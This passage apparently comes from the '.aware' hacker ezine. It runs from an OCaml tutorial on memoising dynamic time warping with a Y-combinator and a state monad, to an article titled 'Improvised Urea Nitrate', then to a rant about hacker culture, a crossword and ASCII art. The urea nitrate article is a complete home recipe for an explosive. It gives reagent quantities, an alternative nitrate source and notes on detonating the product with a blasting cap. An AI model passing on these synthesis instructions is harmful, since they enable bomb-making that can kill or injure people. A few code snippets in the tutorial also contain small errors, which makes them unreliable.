normal-order (or lazy) evaluation here. We do that using eta-expansion [9], i.e. adding an argument to the functions on both sides of the equation: let rec y f x = f (y f) x;; In pure lambda calculus we would have the following (taken from Wikipedia again [10]) Y = \f . (\x . f(x x)) (\x . f (x x)) Applying this to a function gives us: Y g = (\f . (\x . f (x x)) (\x . f (x x))) g => Y g = (\x . g (x x)) (\x . g (x x)) => Y g = (\y . g (y y)) (\x . g (x x)) => Y g = g ((\x . g (x x)) (\x . g (x x))) => Y g = g (Y g) So using this would give us an infinite sequence akin to: g ( g ( g ( g ( g ( g ( g ( ... ( Y g) ... ))))))) This is the sequence the computer attempted to compute when we gave it the simple form of the Y-Combinator. If you look at this from a different perspective, you will notice that this is very much like a fixed-point iteration on the function g. So the Y-Combinator is one of the basic forms of fixed-point combinators. For any function you pass to it in pure lambda calculus, it will yield the fixed point of that function. That was quite a shock to Church and other researchers, when they studied lambda calculus, because there are some functions that simply should not have fixed points, like the "not" function or the increment function. In lambda calculus they do however. This is due to non-terminating functions having a value as well. Well, I better not get into more depth here, because we only need the Y-Combinator for our recursive knots and not to find fixed points. --[ 07 ]-------------------------------------[ Re-introducing the caching ]----- So this is where we stoped: let dtw s1 s2 dist = (* untied version *) let dtw' dtw (a,b) = if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw (a-1,b-1); dtw (a ,b-1); dtw (a-1,b )] in (* retying the knot *) let rec dtw = dtw' dtw in dtw (Array.length s1-1,Array.length s2-1) ;; Now we add the Y-Combinator to this and we get the following: let y f = let rec f' arg = f f' arg in f' ;; let dtw s1 s2 dist = let dtw' dtw (a,b) = if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw (a-1,b-1); dtw (a ,b-1); dtw (a-1,b )] in y dtw' (Array.length s1-1,Array.length s2-1) ;; Now what did we do this for? Quite simple: We want to re-introduce the caching, but we don't do this in our function directly. We rather produce a version of the y-combinator, which does the caching for us: let y f = let cache =Hashtbl.create 10 in let rec f' arg = try let v = Hashtbl.find cache arg in v with Not_found -> let v = f f' arg in Hashtbl.add cache arg v; v in f' ;; let dtw s1 s2 dist = let dtw' dtw (a,b) = if a <0 || b < 0 then infinity else if a = 0 && b = 0 then dist s1.(0) s2.(0) else dist s1.(a) s2.(b) +. List.fold_left min infinity [dtw (a-1,b-1); dtw (a ,b-1); dtw (a-1,b )] in y dtw' (Array.length s1-1,Array.length s2-1) ;; Now, whenever a value is to be calculated, the combinator automatically checks if it has been calculated before. Also, the combinator produces the cached version of the function, at each call to itself. So whenever we pass different arguments to our final dtw function, it will produce a unique cached and recursive version, which is then applied. Thus we do not even have to worry, about cleaning the cache or anything. --[ 08 ]----------------------------[ Getting rid of the imperative cache ]----- The next step is rather straight-forward. We have to exchange the imperative cache using a Hashtable with a functional one using a map. Unfortunately, the Map interface in OCaml is not what it should be (Please, INRIA. Give us a better standard library containing all the stuff we need), so we have to code a module which will then be used as a argument to a functor etc. etc. Straight-forward code: module OrderedPair = struct type t = int * int;; let compare (a1,b1) (a2,b2) = let v1 = a1-a2 in if v1 = 0 then b1-b2 else v1 ;; end module PairMap = Map.Make(OrderedTupel);; I will assume this has been done, wherever I use a map using pairs as keys. If you don't understand this part, don't worry too much, it is not at all important for the other steps. Ok, let's see how our new combinator looks now: let y f arg = let rec f' (cache,arg) = try let v = PairMap.find arg cache in (cache,v) with Not_found -> let (cache',v) = f f' (cache,arg) in (PairMap.add arg v cache',v) in let _,v = f' (PairMap.empty,arg) in v ;; This is basicaly the same as we did before, except that our DTW function has gotten one extra argument. This is to take care that the cache is passed on through all recursive calls. This is also reflected in the changed type: val y : (('a PairMap.t * PairMap.key -> 'a PairMap.t * 'a) -> 'a PairMap.t * PairMap.key -> 'a PairMap.t * 'a) -> PairMap.key -> 'a The uncurrying has been done, to make the input and output of the function more similar, so it's easier to follow what is happening here. A rather similar and uncurried version can be found in [11]. The next part is to include the threading of the cache in our dtw algorithm: let dtw s1 s2 dist = let dtw' dtw (cache,(a,b)) = Printf.printf "Calling DTW on %d %d\n" a b; if a <0 || b < 0 then cache,infinity else if a = 0 && b = 0 then cache,dist s1.(0) s2.(0) else let cache',p1 = dtw (cache,(a-1,b-1)) in let cache'',p2 = dtw (cache',(a ,b-1)) in let cache''',p3 = dtw (cache'',(a-1,b )) in let v = dist s1.(a) s2.(b) +. List.fold_left min infinity [p1; p2; p3] in cache''',v in y dtw' (Array.length s1-1,Array.length s2-1) ;; So now we have occurences of the cache floating around everywhere in our main algorithm. It would be nice if there was a way to get rid of those. Well, we are not the first ones to be facing such a problem. What we are going to use this time are monads, or more particular a kind of state monad. --[ 09 ]-------------------------------------------[ Digression 3: Monads ]----- Ok, here comes the last technique you need to know. You've probably heard about this before, because it is often mentioned in the context of functional programming. What I am talking about are Monads. Monads are a rather powerful device, allowing us to cope with the loss of side effects in a purely functional environment. Some concepts that can be realized using monads are, for example: I/O, list comprehensions, stateful programming, exceptions. One sentence that occurs a lot when reading up on this topic is that some kinds of monads are so simple, that "you could have invented them yourself, and probably have". Isn't it good to know how smart you *really* are? So what exactly are monads? Informally speaking, monads are some kind of wrapped up values. Whenever you have a monad, it will somehow contain one or more values, but you cannot easily access those values. Let's look at a simple example, one that I personally find really easy to understand and one that has not been covered that much: Functions from Ints to something else ('a). That's already a monad. The values you have, in those functions, are wrapped: You need to know the place if you want to access a specific value. However, it would be a nuisance if you always had to figure out the place (or some other sort of key) first. You can also provide rules on how to combine the values, without knowing the place. Which places are combined then depends a lot on the implementation of the monadic operators. Oh, and of course, there is a simple way to construct monads: The return function, which every monad must supply. The return function constructs a monad in the "most simple way", whatever that means. For our function monad the return looks quite simple: let return a = fun ( _ : int) -> a;; See, we wrapped up the value a at all places. Now we have another operator to give rules on how to handle values inside. It's usually called >>= and it has the type: val (>>=) : 'a monad -> ('a -> 'b monad) -> 'b monad So it takes a monad and a rule, and constructs a new monad from that. One simple example on how to use it: m >>= fun x -> return x+2;; This will construct a function monad that contains the former value increased by two at all places. Or we can do a heavyside-function on all our values: m >>= fun x -> if x > 10 then return 1 else return 0 And quite a lot more. The way the >>= is implemented for this is: let (>>=) m fm = fun (v : int) -> (fm (m v)) v;; So now is a time to get a bit more formal. For our definitions to make sense, we would like them to follow a few simple axioms [12]: 1. "return" must preserve all information about its argument. (return a) >>= f <-> f a m >>= return <-> m 2. Binding two functions in succession is the same as binding one function that can be determined from them. (m >>= f) >>= g <-> m >>= (\x -> (f x >>= g)) (Here the symbol "<->" is used to indicate that these two expressions are equivalent) We'll see if we got those for our function monad: 1.1: (return a) >>= f <=> fun v -> f ((return a) v) v | Definition of >>= <=> fun v -> f ((fun _ -> a) v) v | Definition of return <=> fun v -> f a v | Beta-reduction for "(fun _ -> a) v" <=> f a | Eta-contraction 1.2: m >>= return <=> fun v -> return (m v) v | Definition of >>= <=> fun v -> (fun _ -> (m v)) v | Definition of return <=> fun v -> m v | Beta-reduction <=> m | Eta-contraction 2: (m >>= f) >>= g <=> fun v -> (g ((m >>= f) v)) v | Definition of >>= <=> fun v -> | (g ((fun v' -> (f (m v')) v') v)) v | Definition of >>= <=> fun v -> | (g ((f (m v)) v)) v | Beta-reduction <=> fun v -> | (fun v' -> | (g ((f (m v)) v')) v') v | Beta-expansion <=> fun v -> | (f (m v) >>= g) v | Definition of >>= <=> fun v -> | ((fun x -> f x >>= g) (m v)) v | Beta-expansion <=> m >>= (fun x -> f x >>= g) | Definition of >>= [ q.e.d. ] Now, instead of the >>= and the lambda expressions you can often use the do-notation: m >>= fun x -> return x+2;; becomes do x <- m return x+2 For the exchange between those two notations see a nice post on the Jane-street-Blog [13]. As mentioned before, you can also wrap up values with error codes, seperating real calculations from those that have produced errors [14]. Or do list comprehensions using those operators: let return a = [a];; let (>>=) m fm = List.concat (List.map f xs);; For more information I recommend the chapters on monads from the Haskell School of Expression [15]. --[ 10 ]-------------------------------------------------[ Final Solution ]----- Ok, here is our code so far: let y f arg = let rec f' (cache,arg) = try let v = PairMap.find arg cache in (cache,v) with Not_found -> let (cache',v) = f f' (cache,arg) in (PairMap.add arg v cache',v) in let _,v = f' (PairMap.empty,arg) in v ;; let dtw s1 s2 dist = let dtw' dtw (cache,(a,b)) = Printf.printf "Calling DTW on %d %d\n" a b; if a <0 || b < 0 then cache,infinity else if a = 0 && b = 0 then cache,dist s1.(0) s2.(0) else let cache',p1 = dtw (cache,(a-1,b-1)) in let cache'',p2 = dtw (cache',(a ,b-1)) in let cache''',p3 = dtw (cache'',(a-1,b )) in let v = dist s1.(a) s2.(b) +. List.fold_left min infinity [p1; p2; p3] in cache''',v in y dtw' (Array.length s1-1,Array.length s2-1) ;; We wanted to get a monad to do the threading of the cache through the recursions for us. Thus, instead of producing values, we produce functions that depend on a cache to produce values. Things like this are usually called state monads. Because the only type of state we have is our cache, I will call this a cache monad or cmonad here. Let's see how our operators look: let return a = fun c -> c,a;; Ok, that was easy, we just pass on the cache and always return the same value a here. let (>>=) m1 fm2 = fun c0 -> let (c1,v1) = m1 c0 in let m2 = fm2 v1 in m2 c1 ;; Hmm, not to bad either. We just put the cache down our first function, see what comes back and pass that on to the next. Now all we have to do is to reverse the order of the arguments in our Y-´Combinator, passing the position first and then the cache, and then use the monad in our main function: let y f arg = let rec f' arg cache = try let v = PairMap.find arg cache in let a,b = arg in (cache,v) with Not_found -> let (cache',v) = f f' arg cache in (PairMap.add arg v cache',v) in let _,v = f' arg PairMap.empty in v ;; let dtw s1 s2 dist = let dtw' dtw (a,b) = if a <0 || b < 0 then return infinity else if a = 0 && b = 0 then return (dist s1.(0) s2.(0)) else dtw (a-1,b-1) >>= fun p1 -> dtw (a ,b-1) >>= fun p2 -> dtw (a-1,b ) >>= fun p3 -> let v = dist s1.(a) s2.(b) +. List.fold_left min infinity [p1; p2; p3] in return v in y dtw' (Array.length s1-1,Array.length s2-1) ;; Looks a bit more complicated than the imperative version, doesn't it? Well, yeah. If you look at the Y-Combinator, it does. But you can wrap those combinators in a library and reuse them. Then all you have to do is to write down your principle of optimality and it will produce an dynamic programming algorithm for you. Neat, huh? --[ 11 ]---------------------------[ Conclusions and Further perspectives ]----- Ok, so that is all. I hope you enjoyed learning a few more functional programming techniques. If you really want to get a hang of those, I suggest you do a few calculations or proofs on your own. Figuring out what actually goes on in a program is one of the best things you can do to increase your programming skill. Hum, let me get this short example from Hudak's book: instance Monad Label where return a = Label (\ s -> (s,a)) Label lt0 >>= flt1 = Label $ \ s0 -> let (s1,a1) = lt0 s0 Label lt1 = flt1 a1 in lt1 s1 mlabel :: Tree a -> Tree Integer mlabel t = let Label lt = mlab t in snd (lt 0) mlab :: Tree a -> Label (Tree Integer) mlab (Leaf a) = do n <- getlabel return (Leaf n) mlab (Branch t1 t2) = do t1' <- mlab t1 t2' <- mlab t2 return (Branch t1' t2') getLabel :: Label Integer getLabel = Label (\ n -> (n+1,n)) mtest = let t = Branch (Leaf 'a') (Leaf 'b') in mlabel t or alternatively: mtest = let t = Branch (Leaf 'a') (Leaf 'b') in mlabel (Branch t t) If you do those calculations you will probably be left with several pages of writing you'll better hide under your bed, because people visiting you would think that you have gone completely nuts. On the other hand, it will also give you a deeper understanding on how things work beneath the hood of a functional program. Oh, yeah, the final code for the example I used looks like this: module OrderedPair = struct type t = int * int;; let compare (a1,b1) (a2,b2) = let v1 = a1-a2 in if v1 = 0 then b1-b2 else v1 ;; end module PairMap = Map.Make(OrderedPair);; type 'a cmonad = 'a PairMap.t -> 'a PairMap.t * 'a;; let return a = fun c -> c,a;; let (>>=) m1 fm2 = fun c0 -> let (c1,v1) = m1 c0 in let m2 = fm2 v1 in m2 c1 ;; let y f arg = let rec f' arg cache = try let v = PairMap.find arg cache in let a,b = arg in Printf.printf "Retrieving cached value for %d %d\n" a b; (cache,v) with Not_found -> let (cache',v) = f f' arg cache in (PairMap.add arg v cache',v) in let _,v = f' arg PairMap.empty in v ;; let dtw s1 s2 dist = let dtw' dtw (a,b) = Printf.printf "Calling DTW on %d %d\n" a b; if a <0 || b < 0 then return infinity else if a = 0 && b = 0 then return (dist s1.(0) s2.(0)) else dtw (a-1,b-1) >>= fun p1 -> dtw (a ,b-1) >>= fun p2 -> dtw (a-1,b ) >>= fun p3 -> let v = dist s1.(a) s2.(b) +. List.fold_left min infinity [p1; p2; p3] in return v in y dtw' (Array.length s1-1,Array.length s2-1) ;; I added some printfs here, so you can see how it builds up the table for the DTW. All the techniques described here have been taken further in [11], where they use Multi-Stage-Programming (a special type of Meta-Programming) in MetaOCaml to build a library that can solve dynamic programming methods blazingly fast. I also found something called "Algebraic Dynamic Programming" [16,17], but I haven't managed to do more than to scan over those papers so far. Maybe I'll tell you something about this the next time. -------------------------------------------------------------[ References ]----- [1] http://caml.inria.fr/ [2] R. Bellman. Dynamic Programming. Princeton University Press, 1957. [3] http://en.wikipedia.org/wiki/Bellman_equation [4] http://en.wikipedia.org/wiki/Dynamic_time_warping [5] M. Müller. Information Retrieval for Music and Motion. Springer 2007. [6] http://tech.groups.yahoo.com/group/ocaml_beginners/message/9075 [7] Achim Jung. A short Introduction to the Lambda Calculus. Available at: http://www.cs.bham.ac.uk/~axj/pub/papers/lambda-calculus.pdf [8] David C. Keenan. To Dissect a Mockingbird: A Graphical Notation for the Lambda Calculus with Animated Reduction. Available at: http://users.bigpond.net.au/d.keenan/Lambda/ [9] O. Danvy, K. Malmkjær, J. Palsberg. Eta-expansion does The Trick. ACM Transactions on Programming Languages and Systems (TOPLAS) 18.6. ACM, 1996. [10] http://en.wikipedia.org/wiki/Fixed_point_combinator [11] K. Swadi, W. Taha, O. Kiselyov. Staging dynamic programming algorithms. April 2005. Unpublished manuscript. available from http://www.cs.rice.edu/~taha/publications.html. [12] http://en.wikipedia.org/wiki/Monads_in_functional_programming [13] http://ocaml.janestcapital.com/?q=node/23 [14] D. Teller, A. Spiwack, T. Varoquaux. Catch me if you can: Towards type-safe, hierarchical, lightweight, polymorphic and efficient error management in OCaml. 2008, unpublished manuscript. available at: http://lambda-the-ultimate.org/node/2892 [15] P. Hudak. The Haskell School of Expression. Cambridge University Press, 2000. [16] R. Giegerich, C. Meier. Algebraic Dynamic Programming. Springer LNCS. Springer 2002 [17] R. Giegerich and P. Steffen. Implementing Algebraic Dynamic Programming in the Functional and the Imperative Programming Paradigm. Springer LNCS. Springer 2002. --------------------------------------------------------------------[ EOF ]----- [==============================================================================] [--------------------------[ Improvised Urea Nitrate ]-------------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/´_`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### author: Mr.X ################ date: 2008/07/15 *############* "T######T" 1. Introduction --------------- In this file the properties and preparation of urea nitrate will be discussed. Doing some experiments, I found a convenient way to make it from readily available chemicals. It will be presented in this document. 2. Chemical, physical and explosive properties of urea nitrate -------------------------------------------------------------- O || C / \ H2N NH2.HNO3 Urea nitrate, as one can tell from its name, is a salt of nitric acid and urea. It is white crystalline substance with acidic properties. Solubility in cold water is low, in hot water it dissolves readily. Under action of concentrated sulfuric acid or other dehydrating agents it yields nitrourea, which is a more powerful explosive than urea nitrate. Urea nitrate requires a blasting cap to detonate. From my experience I can tell that a few grams of AP is enough. Lead block test is 260-270 cm^3, velocity of detonation is 3400 m/s (at density 0.85 g/cm^3)/4700 (at density 1.2 g/cm^3). Crystal density is 1.59 g/cm^3. 3. How to make one in your basement ----------------------------------- Well, this is quite easy. Needed chemicals: 1. Car battery acid (approx. 35% H2SO4, one should look for it in gas stations and hardware stores). 2. Urea (I bought it as a fertilizer). 3. Ammonium nitrate (It's a fertilizer too, though I heard it is hard to get in some countries). Procedure: 1. In a glass jar, add 60 grams of urea to 150 ml of water. Make sure urea is fully dissolved in water and there is no layer of the material on bottom of jar. Stir the stuff, etc. 2. In another jar, add 107 ml battery acid, 50 ml water and 80 g of ammonium nitrate. As in previous the step, make sure that the AN is fully dissolved. 3. Mix both liquids in one jar. Lots of fine urea nitrate crystals will appear in seconds. (Very fun to watch.) 4. Filter the crystals off. Start to dry them. Don't discard the liquid that you have after filtration, it will still be useful. 5. Put the liquid in some frosty place for a few hours. It shouldn't be too cold though, because that would make the solution freeze. -10 C temperature was fine when I tried it. 6. Some quantity of urea nitrate crystals will be obtained from our liquid. Filter it off immediately after you take the mixture from your freezer/heap of snow and dry. We don't want UN to dissolve again. To make UN more pure, one can recrystalize it from acetone. Reactions that occur during this synthesis: H2SO4 + 2NH4NO3 <--> 2HNO3 + (NH4)2SO4 (Step 2) O O || || C + HNO3 --> C / \ / \ H2N NH2 H2N NH2.HNO3 (Step 3) 4. If you can't get ammonium nitrate... --------------------------------------- Since I am lucky enough to live in a country that does not require a license to buy AN, I was making urea nitrate using it. However, ammonium nitrate is quite unavailable to common people in many places. Luckily, it can be replaced by any inorganic nitrate with good water solubility. Basically, all you need is to have 1 mol of nitrate ions from AN. KNO3 is less soluble in water, but more easily available in many places than NH4NO3. To make urea nitrate using it, use 101 g of this substance instead of ammonium nitrate. In this case, the following reaction takes place during second step of synthesis: H2SO4 + 2KNO3 <--> 2HNO3 + K2SO4 . Potassium nitrate (KNO3) is also fertilizer and one should look for it in stores that have stuff for gardening. I don't think I need to rewrite the recipe. Just substitute 80 g of ammonium nitrate with 101 g of potassium nitrate and add more water to ensure it dissolves. 5. Outro -------- Some recipes I have seen involve adding NH4NO3/KNO3 and urea to hydrochloric acid or diluted H2SO4 and mixing until you get urea nitrate. I found that this way isn't as convenient as preparing solutions in different jars and mixing them. Have fun. 6. References ------------- 1. T. Urbanski - Chemistry And Technology Of Explosives. Vol 3, page 469. 2. Fedoroff & Co. - Encyclopedia Of Explosives and Related Materials. Vol. X, page U 102. 3. Organic Syntheses, Coll. Vol. 1, p. 417 (1941); Vol. 5, p. 85 (1925). http://www.orgsyn.org/orgsyn/pdfs/CV1P0417.pdf [==============================================================================] [------------------------------[ cat /dev/random ]-----------------------------] [==============================================================================] ..,,,,.. .,;;,. CCCCCCCCCCCCCCCCCCC>>>>'' '''',,`;. d$$$$$$$c,>',CCCCCCCCCCCCCCCC>, $$$$$$$$$P",c$$c,`C>',,`"CCCCCCCCCC>, $$$$$$$P",d$$$$$$c =`CCC>`/\. $$$$$P",d$$$$$$$$$c`$c,`CC, $$',$$$$$P\<--\ "$$$c`$$$P `-)CCC'CCCC; ?FJ$$$$$F ><.` `?$$$,""? "" ,CCCCCC>, "\"$$$$ >.\- "$$$bc,,,cc$$bc,`, "$$$ .<< `?$$$$$$$$$$$$$c` ???????""?$$c`< ;,`'>,. $b`'( .: d$$F `"?b, `> $$h < !!!! ::: $F "?" `$$$h,`;': $' `?$d$$.`!!! `!> $ "?$$$,` ? "$$$, `` thoughts on the world, "$b !!!!! the scene, ?b !!!!> and your mom. "$ "$c``!!;, `?L `'/ "?L,`!. `<>,. `'!!>;,,,---- `'---,,,_ _______ _____ ___ _____ _ _ ________________________________ ___| _ \_ _|__ |_ _| _ \_ |_ _| || | Just a personal rambling I had / -_) _/| |/ _| | | | / || || | | __ | to get rid of. Feel invited to \___|_| |___\__| |_| |_|_\\_,_||_| |_||_| skip it if you dont care. ============================================================================== The developers of the computer were scientists and engineers, much too academic to foresee the cancer that would grow from the spawn of their little device. It was made to model FSM's, not cartoon fishes. The internet was a similar idea: It was a network for universities, to exchange information. Of course, noone considered something as absurd as spam when they designed email. On the other hand, it is unavoidable that certain people will push technology to the outer limits of absurdity. I have no problem with that. I just have a problem with people doing any of it to get fame out of it, or even money. People who have no intellectual spirit, no curiosity, people who only hack for the purpose of public masturbation. And there's more and more people, blind in their desperation to be a computer hacker. This is mainly due to the theatrical image of hackers in modern media. Yea, that's right. The typical hollywood hacker is the handsome, unshaved guy with the shady past. He posesses knowledge of some dark art to magically make all technical and computer devices bend to his very will. But he's still the renegade outlaw protagonist, and in the end, he saves the world and rescues the princess. https://www.awarenetwork.org/etc/hacker.htm And now we have IRC servers full of milw0rm* kids, just like YOU, dear reader, who want to be the world's coolest Stan Jobson. People think they're oldskool just because they publish their petty mysql dumps in plaintext. Noone is into freedom of information anymore, the people who call themselves hackers now want to *hide* information. Noone discloses anything anymore, it's a big gay fuckfest of mutual "owning". Not that it wouldn't require any effort. There's a lot of hard work involved to get your part of the wank. But understand: I am not talking about that. I am talking about motivation, and the motivation for all of this is hollow. Purpose has replaced passion. And without passion, there is no beauty in what you do. ,,,xxxx\ ``''==xx#################xxxxx===---xxx##########\ `''################################\ #### ####P' #### #### #### #### ####`'=.. #### ,##### ,#### ###,, ####,,==#####""' ,###`'== '####\ #### ,,##` ""### #### #### #### #### #### ####### #### #### #### #### #### #### #### # ,####' #### ## ,####' ################# ,x## ############## I stand against this development. The .aware zine will always contain actual information; technical and amateur-level scientific papers. This is what hacking should be about - and I don't care about the area of science covered. Chemistry and biology are as good as math or electronics, which are in turn as good as any topic of information science or computer security. -rattle PS: Thanks to Phrack Staff for thinking the same damn thing in a more polite manner, see Phrack CFP for issue #66. *) no offense to milw0rm. @ str0ke: kudos to your good work. [==============================================================================] Now on to happier topics. Look at this mindgobbling cube 3d image! ____ /\ \ / \___\ _\ / __/_ /\ \/_/\ \ / \___\ \___\ _\ / / / __/_ /\ \/___/\/_/\ \ / \___\ / \___\ _\ / __/_ _\ / __/_ /\ \/_/\ \/\ \/_/\ \ / \___\ \___\ \___\ \___\ \ / / / / / / / / \/___/\/___/\/___/\/___/ [==============================================================================] .AWARE Xw0RDZ FOR YOU!! If you know the solution, you know how to reward yourself. But remember: Arrows indicate direction of spelling. This means, some words have to be spelt backwards. Some have to be spelt upside down. _______________________________________________________________________ | | bewitch | | | |###########| | | the prime | WANNA | THE | Cameroon |###########| | | after | CYBER | SOLUTION | TLD |###########| | | 233811140 | | | |###########| |___________|_____v_____|_____v_____|_____v_____|_____v_____|###########| | | v | v | v | v | | | | | | | | Text | | | | | | << segment | | | | | | | | |___________|___________|___________|___________|___________|___________| | | | | | | | | | | | | |Quotient of| | | | | | << codomain | | | | | | | by image | |_____^_____|___________|___________|___________|___________|___________| | ^ | | | | | | | | |l=[045,13] | | | | | Ayanami | |l.sort ( | | ) | | |l==[13,37] | | | | |___________|___________|___________|___________|___________|___________| | | | | | | | | Mrs. | | | | 2600B | | | Lovelace >> | | << file | | | | | | | infector | | |___________|___________|___________|___________|___________|___________| | | | | | | | | zone-h | | | | | | | are? >> | | | | | | | | | | | | |___________|___________|___________|___________|___________|___________| | | | | | | | | | | | | Father | | | | | | >> of | | | | | | | Emacs | | |___________|___________|___________|___________|___________|_____^_____| | | | | | | ^ | | Michael | | | | | Born in | | "burning >> | | | | 1987 (not | | laptop"- | | | | | the year) | |___________//__________|___________|___________|___________|___________| | // | | | | | | _ SEND | | | | | | | rattle | FET >> | | | | | 12yr0.avi | | | | | | |___________|___________|___________|___________|___________|___________| Be the first to beat the complete crossword challenge and get a honorable mention in .aware eZine delta! (except for you, zshzn.) PS: thx to zshzn for his help! [==============================================================================] print(lambda r:(lambda I:'\n'.join([''.join([(lambda S,R:chr(32+(S 2*r*(x+y))))(x**2+y**2,r**2) for x in I]) for y in I]))(range(-4*r,4*r+1)))(6) [==============================================================================] _..gggggppppp.._ _.go2DD54CA5F04E6EE60Aop._ .g4CBD616BE88DF93F761A90FA0393p. .g9A1C6A235A1DC2208D42AB86940C9A954Ep. .oDA77550E3A55D3F079F0B6E6959916DE95CAE3o. .o52950F71920F908B563D6A79DDD4A375DA5978CE25o. o7EC76BC428D48FC156D98C79077EFCE5DA156F4552C40Bo o4A55E5C22696814ECA2332797A7B5B088A9DD82D09D1A0A3o oEE3BBD799DEDE79EAF3B2BFC71CEA704AD412B8FD612A3B29Bo o9D7675F188662EEAD5FA677A6C2F934DE3194460F0E51B57857Co o317227593982925589EF8B5D496D3C0039B7D9200DD44DB26AA8CBo :F0D819CD076F1229B151A00CC514BB9349452681389C6A710C78E791; 43894E690A8FCD6BFFC2325602BE5B9A1E3529EDC610C780878DD79C63 :A52BCB8D42BFFDC72DE221729F0A5A221A01EEEAFDCC83C90165E195B0; C7FA692DAAA1D35EE0AFEA42CC318E55F8CFD72D51B27FBCC8BA9C9B7EB0 :4C9305261B2265F5E69EA44DE49FD840B713E5D94B8DBD52E46033CFE50B; :A249372A3F396FA0FD5B6432B796C57E3DC5B3275607BA92D82E1E839482; C63AB12D97C8445D031BF57246E5616FAC1E713B7B58EF193C15C2A4598ABC 379BD8E3C0133B394F83D67F5B20FD797AD4CADA1EB9621A9F517E0D6925F7 :D1D54FCB21589171B2DBE1D8E87936ABAP"' "QCE3AD9D4CAA0A74B33; :B832EACD8E987E0F18365F974D98F7FF1Y Y04CCB95C9904CC617; 77CF38BC802B1B933E79C99432F185103 EC58A3DB7240EC742 :039AD9304D24EA8E5C13B76E6C7F71CA. .624F0879C4820007; F383A4082BDB1378F30D6E5797FD9559O O050224388E474486 :D05F6D6317D05EFAB48C9C9F77D884C2o,_ _,oDD5FF0DDD9238647; T29CFE61A0A56AF9929295E12C5E82B2FB3CF5F811B4D8C5E35E210P T3B04FAE89130E3915652630B8B84EFEB7BBAB4142EB46C90922EP T02EF86A5DF116B42275CD09135EBA92A51662C9F719C944ABAP TA8137CFF503939AEB079D9566230965C652A2ACEAC29D347P TD45EB4066AC89F3EF5B7E148C295C575ECF62E8E080119P `TF0FDC2A352208F32F3EB2B6F1C94A5F220EC9AE9D0P' `TD5E77B45C728B6AD5549DA225C3A855CAE9ACCP' "^DE7171378BED7E10E5DEB5A0A8377593FF^" "^T8314220058FB8B21831A734F04P^" '""^^^T72B267EFA7T^^^""' depends on the drugs employed. always. always does. mov al,3 ; .aware cr3w restores video m0de - - = ==== = === =] int 10h ; - = = = = ==== ======= === ======= = ======== =] [==============================================================================]